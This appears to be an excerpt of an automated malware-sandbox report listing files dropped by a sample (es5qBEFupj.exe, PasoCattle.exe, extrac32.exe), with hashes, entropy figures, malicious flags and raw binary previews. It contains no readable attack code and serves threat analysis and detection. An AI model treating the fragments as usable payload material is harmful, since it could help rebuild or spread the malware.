                                                                                                                                                                        Preview:.O.L..Q.HP.....g'V.,3?...p7;6}...9...<.B..C.f.JK.HF. .....7.C...p.o....:@....[v%.k.6.e..D.Y.(.p....t.[... ../l...$.6......U.6..Ye.Jw}h...i......l....P..s. .;..Z..O..|....4...{.U.-..s.:Hbs!E.C...Md.x.b %....N.r.-1....3.z.^v..m.a.5.j........jy.dq..D...z...).74..b..Y..x....p.c@.z{....&.D..j.{..........`...^.G........Rpgf..+3........%.i.......A....wde......I1*.3........Lq.fe...Jdr.+./.,7......v....}.Fr.P.......5*cEZ.p.@.....#B.....L...Td......c.....X...........92 N..zn.N.....g.....CMG...:.X......i...MW....T>}%C....>..@.S.+.&.R.......a....D.~......."...... ...z....[.!....r..C.D..1[.}S..zC....C..gv..3../q...S........(..9*M./[.X..t.w.Y..l.T'...$..L.>n........I:\.".i..D(..w....}7;.....2.n!X..l.........#.........D.QA...0p.e$/..7 .{/..H{3..i.U@....ye.....]..o....b.]+......i.$..$..^siT:..{....s...).p..G.C.8..J:.?...@"D.JY=.+["kSq..M..."?.`..r]......|QT~dB..c..O..$.C..*.l...z..1.......m.W......k..`......HY2...Z..]....... ....>f...
                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):104448
                                                                                                                                                                        Entropy (8bit):5.172930596796904
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:sc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVx:/PdKaj6iTcPAsAhxW
                                                                                                                                                                        MD5:BE1780E619FC600C90159E321A7BCBB9
                                                                                                                                                                        SHA1:C710D9B6E5843AD64355C032D4835707B245170E
                                                                                                                                                                        SHA-256:DBA6C4B6BEB02F24A6B4F3C7892605A06A8D99D5F65366C021B1337F1D192852
                                                                                                                                                                        SHA-512:F0BB5EB234DD25FBB7D7107839CBC9E72CBD1E269CA5F4445E245CBAC4CD8E6DD8966BB4DB08C0B0C88AB22E4A78E46CC3323E201E31E15E0E6E9D82C416D0ED
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:................................................................................................................................................................................................b........\... ... |....................................................................L...........I.....................................................................................0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F................?......Y@.....@.@......P?...........................(#...pqrstuvwxyz{$--%"!' .&,[\.....`abcdefghijkmno]......_..................................................................................................................................................1L..2L..2L..2L.$2L.42L.@2L.H2L.T2L.\2L.l2L.t2L.|2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..3L..3L. 3L.,3L.43L.<3L.T3L.`3L.l3L..3L...J..3L..3L..3L..3L..3L..3L..3L..4L..4L.$4L.44L.D4L.T4L.l4L..4L..4L..4L..4L..4L..4L..4L..4L..4L..5L...J..5L.45L.P5L.p5L..5L..5L..5L..5L..6L.$6L.<6L.P6L.h6L..6L..6L..6L..6L
                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):268
                                                                                                                                                                        Entropy (8bit):4.968398681802287
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:1qjvVg3F+X32+hZCt7HSbYwClS6CSNEcixNU:1yGSG+fCtJfjEvq
                                                                                                                                                                        MD5:41B7CDB6E286EE0E44962C8987B91D3C
                                                                                                                                                                        SHA1:E57E0B12ABC823CB91D3ACFA32AD63230405057D
                                                                                                                                                                        SHA-256:43F8E40249EC2FC185FDC323451FB72384EC9FF5910BD927C89CE8C41CACB58B
                                                                                                                                                                        SHA-512:B4423FD2C9D40D3715F93C6E130AF4B81CAA0B3BB3D23AF542D7043E6B91CAB1CCDDDBD2ECE8656736E4A3C594BAD99436432F4BD2EA2EA133FF381DCB8248CA
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:cocks........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..
                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):141312
                                                                                                                                                                        Entropy (8bit):6.686197497967684
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:fEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2uI:sMVIPPL/sZ7HS3zcNPj0nEo3tb2j
                                                                                                                                                                        MD5:2ED9FFBA1FEA63AD6D178AEA296ED891
                                                                                                                                                                        SHA1:E0D1BB0AF918F8DDEE3FB3D593CAF0FC52C77709
                                                                                                                                                                        SHA-256:21B6E909F647CC2B1ADB6945ACEDA0EE2CB3DF2C91641D7609FFAB2DB6A40FA1
                                                                                                                                                                        SHA-512:52524AD966A8D72BB53ECBA0AC5EE5DC0DB6BE0569CC0E7E0C2D03B5266465C5162AD1048AD1B827E3BDCF985D0932E19336C2D5179BCD7E655E87BABB421055
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.U...........tB.E..M.}.G.}..H.E.;}.|..%.......t.;.....v..Fh.............RY...}..}.........E...@..P.u.V.u..u............V.......;E...&....}..t.f.......f#......f;.u.....E...@..P.u.V.u..u..G........t............}......F|.M.+..........C.........M.f9C...........]..e.....C.......%..........E.............U.......8....E...%....=....u".M................%.....M..........E.;.U...C.]........U..........L.............M.,K......K...;.............K......f;.w..F<.....E.............f;.w..F<.....E.;..............E..]..j.....C......E.U.......E.......C.3.U.E..(t..U...5u..E...........~3..E.........U...d......E.........U...N3..E.........U..E........;................+.....U.....+K.....+K..U.E..u..E......}......E..E...y...%.....E......]..E......E.....=....u<..C..].%...........E...........E............E.......]..E....E.}...]..Y.]..........r;.}.........L..............M.,K......K...;.t..U.......U....3..}..E...............E....M.F|.}.+.;.w.Q.u.W.6n.......u..M.....E..?.E......<.....
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):62464
                                                                                                                                                                        Entropy (8bit):7.997732291588885
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:1536:OC2t1VFGBsTxn/fkC+a+kem/B7BKtrFhBzd6g/4k:OC2j+u/CXoJ7ctrfxn/h
                                                                                                                                                                        MD5:50CB864F887F934B80CC62A6BB08D611
                                                                                                                                                                        SHA1:C23F38262D04019CF198D4499DD95945FE078EC4
                                                                                                                                                                        SHA-256:B2F79588B9EC05A7520F42382EA47F596AEB82A83AA4BF3426DB5AA64ABF877A
                                                                                                                                                                        SHA-512:9F68238A297F61C48380CE6867AFB929A231AB88CA836E00400B182F3CF5EED99E69B38A60CBFA578FFBF50D5C3326A6E8ECEFDF719FA8FBB99F1FC4C799E283
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.3.|...zit..ct.]!....).1o......>4...?c._...3...bd..t.[(FiSi._...2.%...".....!P...c.Y ..k...\O.k..i..}...r&..r.*........Y.hTy4...n."....4..=T......A.{...b*<_.4./..+g.(.g.WK..)s..........js..y.i.Y.q8.\..<.6.........S......!..hP..<.f.||.Y..d:8...i.i.T.'5..g.U..B..%..O....fg.v.8.Cp.W....(..3...J?. P$O...:u.Q....K.m.....N.b.A.e.M.7...{. C6U..(<_6y.QV....?..4...^.~.....A4.....U<..^....Y..n}.Y..h.).....Y#u...Y>.u.O.v....:..#..0......$KN.j.gK.(.x4......50.X....*m......\Od.K.}CN....n/."w(.Ru.6...6..\y}.{..w./..U...,&......`<..<....X:@$Ea.....4.....P..>........F..t<.M1C....`..F7EE.....A.m.W.......19.".?H...Q.....0.!K.).W..U.J=h}J... .n..L&5D....'F- s.e...v...@...'.Iwv.IcHPH..w..?..9.5#..C..I0.a.,.D.b.|....~........|9..........3....l_........B`G.UH..I.E......z&..t.M........E.,.&.[..Y..l.G...Ll..W>.3.i..B...S..8V.:\W.............$.c+@-..N/hd.YH.M..8L...WC..IX...?...?!k.F.b.....CLN..C.\..........J....i.....o...o..e.Y.....K..UL.]....K.v...y..e..:..X#.m.
                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):59392
                                                                                                                                                                        Entropy (8bit):6.612657669946948
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:FC5HRu+OoQjz7nts/M26N7oKzYkBvRmLORuCYm9PrpmES6:AhVOoQ7t8T6pUkBJR8CThpmES6
                                                                                                                                                                        MD5:A5CA22529355B052CBCCB045EC8172A1
                                                                                                                                                                        SHA1:12F5D5871B07A1EABB9B57753432FC59680830D2
                                                                                                                                                                        SHA-256:E434C2A8351E6517F35FFA6D38542390AD0A905BC23FAC64E7D61680AE7CEB67
                                                                                                                                                                        SHA-512:AF9D158F1590FB96C1FB7DD1635FE9D1D7528FC3349068363F169907411EE488E2BF6AC03CE851189DBF24FDED3504A574FFF51B5CE6D41E06D8AB9360FC099E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.E........E.Pj.V.u..E.........I...tV.E.....uM.U..$.........@..@.......t.........$........................t........3.@...3..3..Y3._^[....U...4.M..V.u...u..M...)M...3.@....W...t....tz...t....t..E...)M.PV.i.....t].}........t+M...tK.x..tEj,.E..E.0...j.P.X......E......E.P...t+M.j.V.0....I...t..M..E...3.@..3._^....U..U..E......y..........t...=....}.........t.....2.]...U......L.M.SVW.[s..P.L$$.s...L$..3.u..|$ .....................t&...t!.D$...)M.PV.p............]..t$..T.......t....u/f9..<*M.u.h.)M........f9..,*M.u.h.)M...W.W...3.9..t+M...z...f9...q......t+M.h.....D$...2..YP.L$...r..3..D$(0...j,P.D$4P.AW...D$$....D$L.D$(.D$,.....D$P....P3.P.D$.V.0....I..........D$0...........D$4%.....D$...y&3.f9.......W...D$0.....|$P..|..Y.D$P.L.D$4..@t......y.......t........t..........t.......D$4.t...u.....D$,.....D$4.D$(P3.P.D$.V.0....I...t3..~*......t.3.PV...|$..t.3.Pj..D$..0....I...t.3.C..3...D$..(.u.j.P.0...t$ ..0.......3..L$$.).u.j.Q.0..W..0....._^..[..]...U..Q.M...E.P.u...)M..Z.....t,.E
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:modified
                                                                                                                                                                        Size (bytes):83982
                                                                                                                                                                        Entropy (8bit):7.99794941439563
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:1536:SL5dqhmZ4lVzAf9EFl407V6Lf4wXM3wmosIAUZ8DYZyxSr1Pum:WqU2zOmFl40RwfdM3Ros/URcxgmm
                                                                                                                                                                        MD5:B0830E2CE03D5BC821D5136F5D8B4D5E
                                                                                                                                                                        SHA1:99840A43C60501C4F1F0151EE11798C7FA395591
                                                                                                                                                                        SHA-256:D5916524E70C85211005E2E7851E8250BF46ADD8C28FD501DB4BCFBE9EE1ADEE
                                                                                                                                                                        SHA-512:58F230B27771DA357658231E2E7445E7D13239CDB0D10D4CD5FA81267DF6EA4883C23139CE41F4892E64B6EE3CD67176C52375E9710823133B7CE20D0EB62934
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:...U.,..l..I.E.l./@..8......%...i.\w6TJ....Vr...s.Y7"u......T......Z.f..Cv.X...th.....N..Ao.."C..K...(....1;WL...7..59...z..C-+..OD.N.7@.}.]......z;......^.w.2ee(.4.....FS....;B...0.#......f.r8...Y...ao.)../..0......;..ANl...f..m.=[].K.FQ4n...,........5?......E,..o../.}B..<.........te.._..s..}......._-...&.nOj..........[..p.[....CD..',...r.})e..!...K.?*.x.SK.fs.{.u..E3V..8.."...^L.)J....:.................[1.........|.p......Ou.n....+...P...}.&C..!..,.V.P...#..v.P..P..6.....F....I..8...Q...gP)V@..U.......S.wG..k'5>..i`*...KH...\ ..y....................ql...x.....&....o..=...V.H.=W.....LO..#...._H..t.....0..;.&Ie...?.z...@....s......2$r.Am..).A..J...U.5,.(M..._...]h..0...{....1..G....R...L.u....M.....:.q..%.!O....q.|.:....xy....w"N.c..y.t....Y.).-...T#...2=.nB.dM.M...+.p.....M....1_..M...k..Wp.e......M.J.5w].........R.P......(....Z.}b.K...|...vZ.V.p..........D9........t...k.....ge.m.rVj..;..m;D..P.rR..`'5..9.LXY........d.RJ+..)
                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):119633
                                                                                                                                                                        Entropy (8bit):6.0874087589267925
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:sgarB/5el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:sgarB/5elDWy4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                        MD5:7D6337C50FA5EB0681D5B094E58E3541
                                                                                                                                                                        SHA1:BD1A7A54D4F4382AACA1FFAF4A690799CA6081F7
                                                                                                                                                                        SHA-256:791C72AEB0CAF7FC14F0420F053C0698D27D68265810762470307EA489568780
                                                                                                                                                                        SHA-512:A24F3EADC814C87F2D592F64467CC0894347ADE35924507E81719104C0B9F293A76A51D92B5329CB57574B6EE65C71ED1BBE30D61BE041E1AE522ADDE617912F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.KillTimer.7.PostQuitMessage...SetFocus....MoveWindow....DefWindowProcW....MessageBoxW...GetUserObjectSecurity.-.OpenWindowStationW..h.GetProcessWindowStation...SetProcessWindowStation.(.OpenDesktopW..N.CloseWindowStation..J.CloseDesktop....SetUserObjectSecurity...GetWindowRect.6.PostMessageW....MapVirtualKeyW..&.GetDlgCtrlID..d.GetParent...GetClassNameW.;.CharUpperBuffW....EnumChildWindows..{.SendMessageTimeoutW.m.ScreenToClient....GetWindowTextW..,.GetFocus....AttachThreadInput...GetWindowThreadProcessId..!.GetDC.e.ReleaseDC...GetWindowLongW....InvalidateRect....EnableWindow....IsWindowVisible...IsWindowEnabled...IsWindow..#.GetDesktopWindow....EnumWindows...DestroyWindow.K.GetMenu...GetClientRect...BeginPaint....EndPaint..U.CopyRect....SetWindowTextW..'.GetDlgItem..s.SendDlgItemMessageW...EndDialog...MessageBeep...DialogBoxParamW...LoadStringW.!.VkKeyScanW..=.GetKeyState.B.GetKeyboardState....SetKeyboardState....GetAsyncKeyState..v.SendInput.0.keybd_event...SystemParametersInfoW...F
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):59392
                                                                                                                                                                        Entropy (8bit):7.997035686695416
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:1536:F5ORWtjA85b/PQW6wzxYtMbs8VKKXsgN1yFi3eb7:Op85T6tIDVKKXZMoeb7
                                                                                                                                                                        MD5:BF1A63801FCE643D91670984E50AA26C
                                                                                                                                                                        SHA1:96CC6E514ED73B0F0816884E6019F3F3C31F6A80
                                                                                                                                                                        SHA-256:96E885D5F09D9B01BBBB20C5DA4005E84683F65EE061EB2D22F41DA96A1A48A0
                                                                                                                                                                        SHA-512:D741447E64E376442A4FBEE480A94C494219292BB70DF6A346C5244C12F647BDC074F13F53A0FC32202C1D8D6A37C7BAA9CC0E750020492B99781D9CEEE3F943
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.O.L..Q.HP.....g'V.,3?...p7;6}...9...<.B..C.f.JK.HF. .....7.C...p.o....:@....[v%.k.6.e..D.Y.(.p....t.[... ../l...$.6......U.6..Ye.Jw}h...i......l....P..s. .;..Z..O..|....4...{.U.-..s.:Hbs!E.C...Md.x.b %....N.r.-1....3.z.^v..m.a.5.j........jy.dq..D...z...).74..b..Y..x....p.c@.z{....&.D..j.{..........`...^.G........Rpgf..+3........%.i.......A....wde......I1*.3........Lq.fe...Jdr.+./.,7......v....}.Fr.P.......5*cEZ.p.@.....#B.....L...Td......c.....X...........92 N..zn.N.....g.....CMG...:.X......i...MW....T>}%C....>..@.S.+.&.R.......a....D.~......."...... ...z....[.!....r..C.D..1[.}S..zC....C..gv..3../q...S........(..9*M./[.X..t.w.Y..l.T'...$..L.>n........I:\.".i..D(..w....}7;.....2.n!X..l.........#.........D.QA...0p.e$/..7 .{/..H{3..i.U@....ye.....]..o....b.]+......i.$..$..^siT:..{....s...).p..G.C.8..J:.?...@"D.JY=.+["kSq..M..."?.`..r]......|QT~dB..c..O..$.C..*.l...z..1.......m.W......k..`......HY2...Z..]....... ....>f...
                                                                                                                                                                        Process:C:\Users\user\Desktop\es5qBEFupj.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1062983
                                                                                                                                                                        Entropy (8bit):7.969270980145046
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12288:00giFMExCeGp6bA+2lC/S9zD0upW2+IHxb7A8G5jMVTn1Xx1MwT6/OkwyR4UzU+J:/ieH66juI80CT1DMa4LwxIM9HM/U1OK
                                                                                                                                                                        MD5:A3E9A86D6EDE94C3C71D1F7EEA537766
                                                                                                                                                                        SHA1:DDFBF23CBA3ADC0BCAD33162D1BDBEE8CCD12294
                                                                                                                                                                        SHA-256:A7B3B6CA09E92530EF0BD156B0C2C0213E957129BFB83B8A99D2387932BB2CA5
                                                                                                                                                                        SHA-512:AF6391847FF626FF88FF0583ADDE9536EFF25026ACBC0D0165CE27286A8F145CBB0B5059A294D7A14CB497C60B96E9A5DE88D41A3EE6A339FDB554DE51790F0C
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 11%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@.................................t.....@.................................@..........."u..............8+...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc..."u.......v..................@..@.reloc............... ..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):133120
                                                                                                                                                                        Entropy (8bit):6.593902201612224
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:2+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9cob:2mVnjphfhnvO5bLezWWt/Dd314V14Zgz
                                                                                                                                                                        MD5:998B4B6FEEE76BEB9CA721DCD2B8A4E0
                                                                                                                                                                        SHA1:6556CA455B7F7B3B36F5A703746B17D2D662F82B
                                                                                                                                                                        SHA-256:A3718216E2D86886D768FDE1FE869B9F84FA96309ADC8D83CAF1F17B939F76BF
                                                                                                                                                                        SHA-512:A8E92A0CF4CA465313BFE27D860F956F3777B3202A8B1FDFB03DB4AAAD567F3546C525F40D85414D04806D964B650637846FD1F7CCA6736B8C8E327B342C3617
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.~..v..F..H..u....N.P...j...P......u......k1...>3._.F.....^]...U..E.VW.@..H..0.2...P...*...P.\....u......+1...>3._.F.....^]...U..V.u....W.~..v..F..H.......V.P.J..2.....P.......P.....u.......0...>3._.F.....^]...U....SVW.}.3.]..]..]..w....r!.G.j).H..M.......u......M.A......r..G.j).H.......u..W....E....r..O.j).I..k.....u..9....O.....E..I..(.....$..E..G..p....G....u..F..u..u....G.SQ.......P.x....u......./...>3._.F.....^[....U..M.3.9A.v..A....q..VWP......u....../...>3._.F.....^]...U.....e..SVW.}.........j...j.S.X....E.....x..v..@....Mq.....E..M.Q.M.Q.M.Q.M.Q.M.QP.............E.3..e..Fj..E.E.VPS.u..........M..#/...E.3.V.E.E.VPS.}.u..........M.......E.j..E.E.VPS.}.u.........M.......E.j..E.E.VPS.}.u.........M......E.j..E.E.VPS.}.u..].......M......8.......'.3.B.W....H..|1...D1.t..@8.P..|1...D1.t..@8.@.._^3.[....U........=.(M..SVW.L$.uA...@..|....T..t..R83.C.Z..|....T..t..R8.u....B.......3..^..>.Q.....(M..0....M.3..C.|$..y..v..I.......;.u.....2.....!............M..
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):73728
                                                                                                                                                                        Entropy (8bit):7.9975626227798315
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:1536:cQ36ddIs69BLJSqA8PWfAx/lruBD5hf6akJGg1lg+xM4Zl:cQlF9oAjrO4G+a+xMyl
                                                                                                                                                                        MD5:832042466014761981CDAF193F0E7041
                                                                                                                                                                        SHA1:301225CDE7E7DE3A10E98D7C9DE191D85AAC0099
                                                                                                                                                                        SHA-256:FF5E35AC52EA87EC94D3847112D9F3083B3BF252FA74C76D453EE118BA1A2BE8
                                                                                                                                                                        SHA-512:2A49ECD5DE8702A71267463B8CD130F1AA91D1E3F8D9EB866B8C58C8FC46374F98AECDCDCD071D207F734A61D082AAA56170152EEDA3C0E445C0A5CCD6A50260
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..2O;.....=F.u...~X.^tu4ey?...v............E=.....U..x...'...=.g.....=..".......C-..}...8...8.Br..g]....M.-.>.r,...I.......!.5..f.4...FV.U.,.%zY...~.ysqV..V...I...?...)..zRsa...#.G..C.pqe.b{.:%k.y...)..Y..-<.n.J/<gkN..m.\.L.I.VIC q.rc..YMn%<....O.......4.....J..C,s..U.{N.z.pAU..dX...M.7.$1...a..&..|89...}).g...F.e.p.....&..P..t.0......64.$)...K..f2.!.P.P...A...~..G..!.M.f.f..._...i..U.<..@9 .....2.FN.`....fT..#[...\9.0.kO.S.^A.....K:.....a.AES2...ps$.8F5... UF......(.X=Ha............s.rb.._f.A...q..*..#.....M..T...qj:...$0Y...P...r..o..].m.f.>.1_|.p76.........a..6.>G.a.....c...]u+.$....v. 3[-e...D.kw. ..Y.O.a.BsW....E...bw`..Y.7>...<......e.....a..*E...Vy..#u3..A.YW......~......w.-P..)S..4.J...k..JZ.\.HR..V...y....q..jB..@.G@-..Q5."[.&A.J!....F.'J4..>.......< ........@..c5/K.y.....S......?.3.Q...2M........?~....GQ0.k8.{5[.P\WY..7....k.wc.JA.k..77"^a.n...I.#....J.M..p!....t=z..?W .Iqi...b..!PDv...)3.....;,#.uH2...X....+..<.G;hM......$.Npr.e....|.
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):100352
                                                                                                                                                                        Entropy (8bit):7.9982884825197775
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:1536:qIl7/T+lGxZhNlCtHtyAtgvWscqQlxaDOgASCZ5FSJqz7D6qAK8KxGBpM:xZL33R0HtyA+RQlKOmxw/D8KxGBpM
                                                                                                                                                                        MD5:CD00C53F92FBED3C8947B7205A4247ED
                                                                                                                                                                        SHA1:87D5486B7EFD98DCC92B4393D20D39D12CB6487E
                                                                                                                                                                        SHA-256:EDD50131DA69EA2747D0BCA3ECD4293778BEB5491FBF02BF6D4ADA4B2E9F01C1
                                                                                                                                                                        SHA-512:D1C7AAD1E7F376C7622031D36A3C1F2452B693E5FA976B35CFC22045180388B55218FA8C2B0270C2F66C996B805112C6D82F312642809D9051F350AE1220A85E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..t!@xF.....U...-p.....)..1^....Y.....w...z..(.....b.$\X..2..#.....6c..@...\.E$R.u....Z.]..<`..v...9.a.W..N?=...6..d._......9.~.5~.....Jd...~0h'.............bf.6....Q.I........J.U.d......I...\.'J..m..).n.,S.../.............*...$.j.....,L.-....`s2..2...V........U.6.\./U~...y...K..2.i.*z...l.k.EQ..*+.=.....E]T.\Y.?.C..'*.m...hP.'.M..mc....:}.e6-^.g..$...o.k.b]!@...Vl.,.e.O.....9S.?..MA......|...U?].....D..f...*.D=....za.Nf......46.I......>..../T(6...L..B..Y.8.3B..J.[S..@........%..^..e$.ck......b.h.....Y.$:.K_p}c.;i..C.}..O.D |.&...*f|n.......yq....#|..B..T..F....t..R~)d)<.N.0......tp.9..~Co.....W.n.(1.).y...%_.......Y....D(..b....>..)^....dGX..iA.9...n.H8...pn...D...\.......a5.t\<1.N..=.......v..e.q.M.W..]....a.-7~*BO.k..j...|3.}_2jz.A3.X.-3(.fN\.4.>J......yG...om......f....v..uCP...+g...i.IU{R..Be8.....o5...=...k.n`(..m..w..S.9.@..l.ri...U?..ctD+...+S...u.e;..G.G.=3S,.S.......q....M.U/z.>..y..k....e..J&4$.z.....[B..J.Ax0..!]fr....M..Ry
                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):88064
                                                                                                                                                                        Entropy (8bit):5.844749716437728
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:xj62SfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwug:xjfTq8QLeAg0Fuz08XvBNbjaAtg
                                                                                                                                                                        MD5:7A1D29A789B8F5CA0F4186AA1DBC3BC2
                                                                                                                                                                        SHA1:A9A3169FF90FA2BFFB8D96F95FFDB3A70386B476
                                                                                                                                                                        SHA-256:A513073A8C2E7F41CF78374498C2D980CD8DA473246AF5475C53C1D7FA7BA0DE
                                                                                                                                                                        SHA-512:AD90D9521F68AFFDA3AD4CCA4ECF1A72C3CFCB465F3D60FB8BCB02FFACD3ABD9F1DBF03C022F13FC68DA74080355CE36C0B13D4E511E0857AF60C30B2032D3A0
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..F.. r.^].U..QS.].V.u..U..C.W....Cx.<H....b....}....0....{P.........w.E.;........C|......E.;...(.....2.....%....=....u....#....#....................%....=....u....#....#.....................L..............M.,K.;.t-.....K...;.t ......K....@.K...;..........;.u......E.;}...F...+U......u..~.+.N;S|sa........E.=....w..C<.]......]..].......w..C<....9M.u1.........~..[|N;.s.............f;.u......j.X....._^[..U..QQSV.u...M.W..xQ;u.}L.D..+..E....E....P.......Y..u.j..+...E..u...HQW.R...E....3.f..8.M..E..9..j.X_^[..U....SVW....3.B.....#.M.......sQ.......u%f..u....L.............j..T>.X....3...f..t...........T8.t..E.........j.Y..".t... ...f...........E......}..E......U.3.E.B.......f;.u<....}..t&%....=....u.........#.#..............;...........j.Xf;..........}..tZ..%....j.[=....u.........#.#....................%....=....u"............%....................;.r.;...r...3.B...j.Yf....'....E._^[..E......L.....E....E.,K..E.3.f;].....E..E.....2....$...I.j.Xf;..........K.<.......<....
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                        File Type:Microsoft Cabinet archive data, 488808 bytes, 9 files, at 0x2c +A "Cooked" +A "Receiver", ID 6076, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):488808
                                                                                                                                                                        Entropy (8bit):7.998475465922649
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:12288:ohQLaKCeh787wflZffn5DMrTn1GF1MwTYcOkxFdryB:PaenflZ1iT1CMaLLxFde
                                                                                                                                                                        MD5:97942C5C8DFF98863EFC71FC15CE0257
                                                                                                                                                                        SHA1:14D6BA8E5C3B7BE1BE540CA7ECAA075D5C505E3B
                                                                                                                                                                        SHA-256:B4A2CBEAA8185681ED75BDF2C34020CCAA9405A42A47C4C3D17EC6E907FD9152
                                                                                                                                                                        SHA-512:7D1FABB306D3CD38985CE6472DF17973AEE7F4D56902D48A1CF690BBAF8D5BA71D83DD79136FCA635AB51813FC3978E9871DECAD0E07D46BEE5A998E5CB77D6F
                                                                                                                                                                        Malicious:false
